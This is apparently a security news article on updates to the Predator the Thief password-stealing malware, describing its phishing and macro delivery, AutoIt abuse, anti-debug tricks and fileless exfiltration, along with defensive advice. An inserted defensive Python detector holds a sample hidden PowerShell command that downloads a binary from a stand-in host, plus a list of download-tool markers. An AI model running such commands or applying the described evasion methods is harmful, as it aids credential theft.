In July 2019, FortiGuard Labs discovered that hackers had launched a very potent malware capable of stealing usernames and passwords through a phishing campaign. The attackers delivered Predator the Thief in various phishing lures, such as fake PDFs, fake documents, and fake ZIP and WinRAR archives.
Researchers found that the malware was sold mainly on game-cheating forums, the dark web, and hacking forums. According to the research, it is designed to replace cryptocurrency wallet addresses in the clipboard buffer, steal passwords, take photos with the device's webcam, and much more.
Recently, the password-stealing malware has been updated again. Predator the Thief first moved to version 3.0.8 and then to 3.3.3 on Christmas Eve. FortiGuard Labs has now found that the malware has been updated to version 3.3.4, with only minor differences from the previous versions.
Predator the Thief has become stealthier and more complex than its previous versions. This is a serious cause for concern and an indication that cybercriminals are constantly upgrading the potency of their tools to attack even well-defended targets.
Predator the Thief Analysis
Image Source: www.fumic0.com
According to FortiGuard, Predator the Thief is delivered in multiple phishing documents that pose as genuine invoices. The hackers behind the attack convince targets to open the malicious attachment in the message; when it is opened, an AutoOpen macro runs the malicious VBA script on the host.
After this, three files are downloaded through PowerShell. The next stage uses the legitimate AutoIt3.exe interpreter to run a decoded AutoIt script. Further instructions are executed before Predator the Thief is loaded into a hollowed process, as explained by FortiGuard. The researchers also found that the developers use Telegram to promote their business, and that they update both the panel and the stealer almost every month.
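As an added example (not code from the article or from FortiGuard), the following Python sketch flags the delivery chain just described, an Office application spawning a PowerShell download that in turn launches AutoIt3.exe, in process-creation events; the event fields and the sample events are constructed for this illustration.

```python
"""Added detection example (not code from the article or from FortiGuard): flag the
delivery chain described above (Office app -> PowerShell download -> legitimate
AutoIt3.exe running a script) in process-creation events. Fields and samples are constructed."""

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ", "curl ", "wget ")

# Constructed sample: a Word document launches PowerShell, which downloads a file and
# then runs AutoIt3.exe; a benign AutoIt3.exe launch from Explorer is included as a control.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "cmdline": "WINWORD.EXE invoice.doc"},
    {"pid": 101, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.bin','a.bin')"},
    {"pid": 102, "ppid": 101, "image": "C:\\Users\\u\\AppData\\Local\\Temp\\AutoIt3.exe",
     "cmdline": "AutoIt3.exe decoded.au3"},
    {"pid": 200, "ppid": 20, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": "C:\\Program Files\\AutoIt3\\AutoIt3.exe", "cmdline": "AutoIt3.exe build.au3"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestor_events(pid, by_pid):
    """Walk the parent chain from pid outward, yielding every ancestor we have an event for."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]

def is_downloading_powershell(ev):
    cmd = ev["cmdline"].lower()
    return basename(ev["image"]) == "powershell.exe" and any(m in cmd for m in DOWNLOAD_MARKERS)

def find_suspicious_chains(events):
    """One hit per AutoIt3.exe launch whose ancestry holds a downloading PowerShell
    that was itself spawned (directly or not) by an Office application."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "autoit3.exe":
            continue
        chain = list(ancestor_events(e["ppid"], by_pid))  # parent, grandparent, ...
        for i, anc in enumerate(chain):
            if is_downloading_powershell(anc) and any(basename(a["image"]) in OFFICE for a in chain[i + 1:]):
                hits.append({"pid": e["pid"], "chain": [basename(a["image"]) for a in chain]})
                break
    return hits
```

Running find_suspicious_chains(SAMPLE_EVENTS) reports only the AutoIt3.exe launch that descends from the Word document, not the one started from Explorer.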
Compared with the previous updates, the stealer side did not change much in the new version, but a number of features were added, including a new anti-debug trick. This version copies a portion of ntdll.dll into a designated memory region, hooks that copy with shellcode, and calls one of the relevant functions from it for anti-debug purposes.
This is designed so that user-mode hooks on NtQueryInformationProcess cannot intercept the call, leaving a debugger no chance of going undetected. According to the report, the feature also checks the CRC32 checksum of that memory region to detect any tampering.
In addition, more complex assembly code has been added to the new version. Most of the junk code in the main routine has been removed. Interestingly, the assembly code is much shorter than in previous versions, yet far more convoluted.
The stolen passwords and other credentials are also delivered as ZIP files. The malware allocates memory for the entire ZIP file structure and then appends the archive directly from memory to the request data. As the report explains, no files are created on the file system.
The updated version of Predator the Thief abuses the legitimate AutoIt software to execute its payload. Its configuration is detailed and complex, anti-analysis features are employed, and the whole program flow has changed substantially.
It is harder for analysts to assess the full damage to a victim's system because the malware gathers information in a fileless way and deletes itself right after delivering the data to its command-and-control server. According to the FortiGuard research team, it also runs more modules and attempts to deliver second-stage malware in various ways.
Predator the Thief is currently on sale on the dark web and other hacking forums, and, as expected, hackers will surely buy it and use it in their phishing campaigns. The only way to stay safe is to follow the basic steps for avoiding malware attacks, which mostly start with malicious attachments.
Image Source: www.broadanalysis.com
It is important for individuals and organisations to update their antivirus software to the latest release, avoid clicking suspicious links in emails, avoid unsecured websites, and keep backups of sensitive files. Predator the Thief and other malware are updated over time to defeat your system's defences, so your cybersecurity tools must be updated to match.
It is worth noting that hackers mostly target the weakest link in a firm to improve the chance of their malicious attachments being opened. That weakest link is usually an employee, which is why staff should be trained in basic cybersecurity procedures.
Disclaimer: Darkweblink.com does not promote or endorse claims that have been made by any parties in this article. The information provided here is for the general purpose only and unintended to promote or support purchasing and/or selling of any products and services or serve as a recommendation in the involvement of doing so. Neither Darkweblink.com nor any member is responsible directly or indirectly for any loss or damage caused or alleged to be caused by or in relation to the reliance on or usage of any content, goods or services mentioned in this article.